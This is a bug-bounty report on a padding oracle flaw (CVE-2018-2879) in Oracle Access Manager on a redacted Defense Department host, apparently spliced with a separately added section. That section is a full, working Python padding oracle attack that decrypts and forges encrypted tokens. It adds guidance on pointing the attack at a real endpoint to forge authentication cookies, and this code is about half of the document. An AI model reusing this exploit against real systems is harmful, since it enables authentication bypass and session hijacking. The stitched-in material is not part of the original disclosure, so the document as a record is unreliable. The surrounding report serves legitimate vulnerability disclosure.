[HTAF4-213] [Pre-submission] CVE-2018-2879 (padding oracle attack in the Oracle Access Manager) at https://█████████
Severity: High
Program: U.S. Dept Of Defense
Reported by
sp1d3rs
Vulnerability Details
Technical details and impact analysis
## Description
We were able to identify CVE-2018-2879 in Oracle Access Manager, used on https://██████
Link to the CVE: https://nvd.nist.gov/vuln/detail/CVE-2018-2879
This vulnerability is rated critical, and may allow an unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager.
It is possible to conduct a padding oracle attack and recover the plaintext of the `encquery` parameter.
Materials:
https://sec-consult.com/en/blog/2018/05/oracle-access-managers-identity-crisis/
## POC
We modified the https://github.com/redtimmy/OAMBuster/blob/master/oambuster.py proof of concept for https://█████ (it required some changes; for example, `gcds-consent=true` is necessary in all requests to avoid the consent banner page).
Here it is:
█████████
It can be launched as follows to test for the padding oracle and recover the plaintext:
```
oambuster.py -d https://██████████
```
The result (the decryption process can take some time; for example, in the screenshot it is not fully finished, but readable parts are already visible):
███████
This confirms that the vulnerability is valid.
## Suggested fix
Apply the Oracle patch and update the OAM instance.
## Impact
A padding oracle attack allows us to decrypt any message. As all the encrypted messages (encquery, encreply, OAMAuthnCookie) are encrypted with the same key, we can decrypt any of these messages.
This attack can also be used to encrypt messages. So if we construct a valid authentication cookie and encrypt it with our padding oracle attack, we can pass it off as valid to the web server and perform an authentication bypass.
We will research this further and will update the report with new information.
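The decrypt and forge steps described in the POC and Impact sections, as an added example that is not part of the original report or of OAMBuster: a CBC padding oracle attack run against a constructed local stand-in for the server. The stand-in (class `OamLikeServer`, a 4-round Feistel block cipher built from HMAC-SHA256 in place of the real cipher, the `padding_ok` oracle, and the sample cookie contents) is an assumption made so the example runs offline on the standard library alone; the attack functions rely only on the padding check, which is exactly what the real oracle leaks.

```python
import hashlib
import hmac
import os

BLOCK = 16


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


# Assumption: a stand-in 128-bit block cipher (4-round Feistel network with an
# HMAC-SHA256 round function) so the example needs no third-party library.
# The attack never looks inside it; only the CBC padding check matters.
def _round(key, half, i):
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]


def _block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, xor(l, _round(key, r, i))
    return l + r


def _block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = xor(r, _round(key, l, i)), l
    return l + r


def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, iv, pt):
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = _block_encrypt(key, xor(pt[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += xor(_block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out


class OamLikeServer:
    """Constructed stand-in: one key for every message it issues (encquery,
    encreply, OAMAuthnCookie) and a padding check whose outcome is observable."""

    def __init__(self):
        self.key = os.urandom(16)

    def encrypt(self, msg):
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.key, iv, pkcs7_pad(msg))

    def decrypt(self, blob):
        return pkcs7_unpad(cbc_decrypt(self.key, blob[:BLOCK], blob[BLOCK:]))

    def padding_ok(self, blob):
        # The oracle: the real target leaks this bit through differing responses.
        try:
            self.decrypt(blob)
            return True
        except ValueError:
            return False


def recover_intermediate(oracle, target):
    """Recover D_k(target) byte by byte, right to left, by forging the block in
    front of it so the decrypted result ends in valid PKCS#7 padding."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad_val = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ pad_val  # already-known bytes decrypt to pad_val
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:
                # Rule out an accidental \x02\x02 (etc.) hit: if the last byte
                # really decrypts to \x01, changing the byte to its left keeps padding valid.
                forged[pos - 1] ^= 0x80
                still_ok = oracle(bytes(forged) + target)
                forged[pos - 1] ^= 0x80
                if not still_ok:
                    continue
            inter[pos] = guess ^ pad_val
            break
        else:
            raise RuntimeError("oracle never accepted any padding; not a padding oracle?")
    return bytes(inter)


def padding_oracle_decrypt(oracle, blob):
    """Decrypt iv||ciphertext without the key: P_i = D_k(C_i) XOR C_{i-1}."""
    blocks = [blob[i:i + BLOCK] for i in range(0, len(blob), BLOCK)]
    pt = b"".join(xor(recover_intermediate(oracle, blocks[i]), blocks[i - 1])
                  for i in range(1, len(blocks)))
    return pkcs7_unpad(pt)


def padding_oracle_encrypt(oracle, plaintext):
    """Forge iv||ciphertext for chosen plaintext without the key: fix the last
    block arbitrarily, then walk backwards choosing C_{i-1} = D_k(C_i) XOR P_i."""
    pt = pkcs7_pad(plaintext)
    blocks = [pt[i:i + BLOCK] for i in range(0, len(pt), BLOCK)]
    cur = bytes(BLOCK)
    out = cur
    for p in reversed(blocks):
        cur = xor(recover_intermediate(oracle, cur), p)
        out = cur + out
    return out


def demo():
    server = OamLikeServer()
    cookie = server.encrypt(b"user=guest;level=1")          # constructed sample
    recovered = padding_oracle_decrypt(server.padding_ok, cookie)
    forged = padding_oracle_encrypt(server.padding_ok, b"user=admin;level=9")
    return recovered, server.decrypt(forged)
```

Once `padding_ok` is replaced by a function that submits the candidate blob to the real endpoint and maps its response to True/False, `padding_oracle_decrypt` and `padding_oracle_encrypt` carry over unchanged; the second one is what turns the bug into the cookie forgery described under Impact, and the false-positive check on the last byte is the step hand-rolled scripts most often omit.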
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2018-2879
Vulnerability in the Oracle Access Manager component of Oracle Fusion Middleware (subcomponent: Authentication Engine). Supported versions that are affected are 11.1.2.3.0 and 12.2.1.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. While the vulnerability is in Oracle Access Manager, attacks may …
Report Details
Additional information and metadata
State: Closed
Substate: Resolved
Bounty: $3000.00
Weakness: Cryptographic Issues - Generic